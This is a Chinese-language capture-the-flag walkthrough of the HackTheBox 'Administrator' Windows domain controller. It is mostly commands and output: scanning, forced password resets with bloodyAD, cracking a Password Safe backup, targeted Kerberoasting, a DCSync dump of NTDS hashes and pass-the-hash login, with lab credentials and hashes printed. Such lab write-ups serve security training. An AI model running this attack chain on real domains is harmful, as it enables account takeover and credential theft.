Administrator
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
1. user
1.1. 信息收集
1.1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.42 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 09:19 EDT
Nmap scan report for 10.10.11.42
Host is up (0.063s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
57979/tcp open unknown
57983/tcp open unknown
57985/tcp open unknown
58007/tcp open unknown
58039/tcp open unknown
62805/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.42 -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,57979,57983,57985,58007,58039,62805 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 09:20 EDT
Nmap scan report for 10.10.11.42
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-04 19:56:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57979/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
57983/tcp open msrpc Microsoft Windows RPC
57985/tcp open msrpc Microsoft Windows RPC
58007/tcp open msrpc Microsoft Windows RPC
58039/tcp open msrpc Microsoft Windows RPC
62805/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h35m55s
| smb2-time:
| date: 2025-08-04T19:57:49
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.91 seconds
1.1.2. user Olivia
验证一下是否有效
nxc smb 10.10.11.42 -u Olivia -p ichliebedich --timeout 999
1.1.3. SMB
nxc smb 10.10.11.42 -u Olivia -p ichliebedich --shares
没什么特别的
1.1.4. FTP
ftp administrator.htb
1.1.5. 域用户
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb 10.10.11.42 -u Olivia -p ichliebedich --users
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.10.11.42 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.42 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain
SMB 10.10.11.42 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.42 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account
SMB 10.10.11.42 445 DC olivia 2024-10-06 01:22:48 0
SMB 10.10.11.42 445 DC michael 2024-10-06 01:33:37 0
SMB 10.10.11.42 445 DC benjamin 2024-10-06 01:34:56 0
SMB 10.10.11.42 445 DC emily 2024-10-30 23:40:02 0
SMB 10.10.11.42 445 DC ethan 2024-10-12 20:52:14 0
SMB 10.10.11.42 445 DC alexander 2024-10-31 00:18:04 0
SMB 10.10.11.42 445 DC emma 2024-10-31 00:18:35 0
SMB 10.10.11.42 445 DC [*] Enumerated 10 local users: ADMINISTRATOR
1.1.6. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# rusthound-ce --domain administrator.htb -u Olivia -p ichliebedich -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 09:34:50 on 08/04/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-08-04T13:34:50Z INFO rusthound_ce] Verbosity level: Info
[2025-08-04T13:34:50Z INFO rusthound_ce] Collection method: All
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Starting data collection...
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:34:56Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=administrator,DC=htb
[2025-08-04T13:34:56Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:22Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb
[2025-08-04T13:35:22Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:51Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=administrator,DC=htb
[2025-08-04T13:35:51Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=administrator,DC=htb
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=administrator,DC=htb
[2025-08-04T13:35:52Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-08-04T13:35:52Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-08-04T13:35:52Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░��░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 0/1
█████████████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░��░░ 8/7
[2025-08-04T13:35:52Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 11 users parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] .//20250804093552_administrator-htb_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 09:35:52 on 08/04/25! Happy Graphing!
1.2. ForceChangePassword x2
基本操作
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# bloodyAD --host 10.10.11.42 -d administrator.htb -u Olivia -p ichliebedich set password MICHAEL Admin123!
[+] Password changed successfully!
验证一下
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u michael -p Admin123!
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:Admin123!
继续
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# bloodyAD --host 10.10.11.42 -d administrator.htb -u MICHAEL -p Admin123! set password BENJAMIN Admin123!
[+] Password changed successfully!
验证一下
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u BENJAMIN -p Admin123!
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\BENJAMIN:Admin123!
1.3. FTP
这个用户在 share组里面,要么是 smb共享 要么就是ftp了
smb
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u BENJAMIN -p Admin123! --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\BENJAMIN:Admin123!
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
没有东西
FTP
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): BENJAMIN
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
#ftp> ls -l
229 Entering Extended Passive Mode (|||58213|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 `Backup.psafe3`
226 Transfer complete.
#ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58215|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************| 952 1.51 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (1.51 KiB/s)
ftp>
#ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# file Backup.psafe3
Backup.psafe3: Password Safe V3 database
1.4. Password Safe v3 crack
直接用 hashcat 爆破,
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# hashcat -h |grep -i 'Password Safe V3'
5200 | Password Safe v3 | Password Manager
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
Backup.psafe3:tekieromucho
下载保险箱解密
可以获取到三对凭证
| 用户名 | 密码 |
|---|---|
| alexander | UrkIbagoxMyUGw0aPlj9B0AXSea4Sw |
| emily | UXLCI5iETUsIBoFVTj8yQFKoHjXmb |
| emma | WwANQWnmJnGV07WQN8bMS7FMAbjNur |
发现 emily 对 ETHAN 有 GenericWrite权限
而且emily还是远程管理组的成员
1.5. winrm
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> gc ../desktop/user.txt
1badf521398**************************
2. system
这里有genericWrite权限,但是域内没有CA 没法用影子凭证,可以尝试 Targeted Kerberoasting
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# targetedKerberoast.py -v -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$d516fe9d3d85f7de8a063bfe804701fe$3f3851db727a9f22998b43efbe8a172ffa6318907a1d3a2a9b696f7afeadbf4eb09d59f493d54f98ae28de1dda88e12a2a502fb15ad102c2b2cfab89eb1eec6300479632e52c30a4cdf374e58a4f40cc1e174738a91fb545a20444c7005697d6c4032280692e8d31c3ec95c3ecce8138cffd75707ae47eee247a3ecbc528f2c7aab31afa6653f6fd9fbcdbd882230e85999d7726c35f85ebb3a8bd26d4b779d671081c23702a3d137192627344169839f162a7cb202a6e966df15047da81ab9d7c3cd85fad71e69098f95efba40143e9adb8761396ef33749f6ad4fa0c2501978e6afe8517903efa7c12ae1f484205098a88f14e714233652486c50da21a1b7d96e3764b579005e92aa8600a1709a802d37ddab52622d86651283504fafd313405de55f58f57b454f2b405c13a1ba83a1402e2bbc1a18c716d5172a372f95350435f806f37fbdee2f94623da41011b72d8229da3362660dac465e6a20846faa2b2b668a230f48049d2fe99e7d10e10a94a53bc6b5d322f7a295576f3278823f7cfad762cf79efd6b15c0164da649004000cf3032d760ed056a0d20f57b11b028d8ec33767abb80462dca4822e9923a4b73925b445ec5c795fb468dae3e56f6460b45aa4ef2a96196cbbc9efd2e72a88e43377c764262fa6f3ccfe69f1dd42247bed8ee16d8d044ccc964f3e64bb4fa97115c7eb9c47beafca45e6fd08c9cabf1d04c4c79dd0c59057baa5d442d7ae58bfd004dc61f9b763b7cafb09a90e2ea76281bca3354db1f536bf00106ef2113500388c1b4323d7196208db86d46cc4c7d9c8ac4ca8058eec1b9428fa3e5d1d39df362e942a6ede7b286e1f770362329ebd6c3dfd82bf04e25154787afb57186562874727686baa816cd2d6322aa9fef6164e66c9577ff8ea102d410072409b5aa16b37dccc08c7278aadf192264c32d55e783224367f07b6020dc11522ac14ed2960bc56e38cfc9aeb96acdd86aee992c5133399a1fea41efb3f9e6280c44d9f1ff02ff1d23639ca8f174cff06295ec36242fce14ba4f0afe52f65e07572550c60dd23bced1c5b64fbf07d82f92ca47c9bc036e73ccf880f554e749c808d4b20e72fbaee5e7b742c827f292f92cda7abf2e41ffb96851659f7d945371daf7eb1e7dd9f98fc8fb29d16f071a72875c5b09068167eefb06bbbcac5eed134c62621f2e36d753f1c8ff5cdd3c6462cfe4c1dda621b85f63827e1a8adcbe6e48c2f159c7e158373838998b2bec0521ce8f1e00b45f6b7be0f1dc9e744b3307025b0f298737ff912b1e4bd0f6426d186ff4e5ac8d1c8dcfca5299b982433ea5897415424586f42cf1e8a8aa7ceebb798995d9bc5dc76b217b5436b5dbb0119c48a1c51ff8ade0ba32620bb6dfa03602536c4a9ee42b87b3f2c94f6919d6489b175154fb76ebebe0d39a873d056ecdb338d44f57a38acacda39bf89a1252a1c4bfd22267d54bf5af3b85c1ece721dc6b9e5c2bebc3ba204455a46e92abb04e83cb1066191e40bc0e0b6781a4c99914cb2c3992
[VERBOSE] SPN removed successfully for (ethan)
hashcat破解
2.2. DCSync
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u ethan -p limpbizkit --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\ethan:limpbizkit
SMB 10.10.11.42 445 DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.11.42 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.42 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
SMB 10.10.11.42 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.42 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
SMB 10.10.11.42 445 DC administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
SMB 10.10.11.42 445 DC administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
SMB 10.10.11.42 445 DC administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
SMB 10.10.11.42 445 DC administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
SMB 10.10.11.42 445 DC administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
SMB 10.10.11.42 445 DC administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
SMB 10.10.11.42 445 DC administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
SMB 10.10.11.42 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
SMB 10.10.11.42 445 DC [+] Dumped 11 NTDS hashes to /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds of which 10 were added to the database
SMB 10.10.11.42 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.10.11.42 445 DC [*] cat /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.10.11.42 445 DC [*] grep -iv disabled /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds | cut -d ':' -f1
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt
2125192b3911b2&*************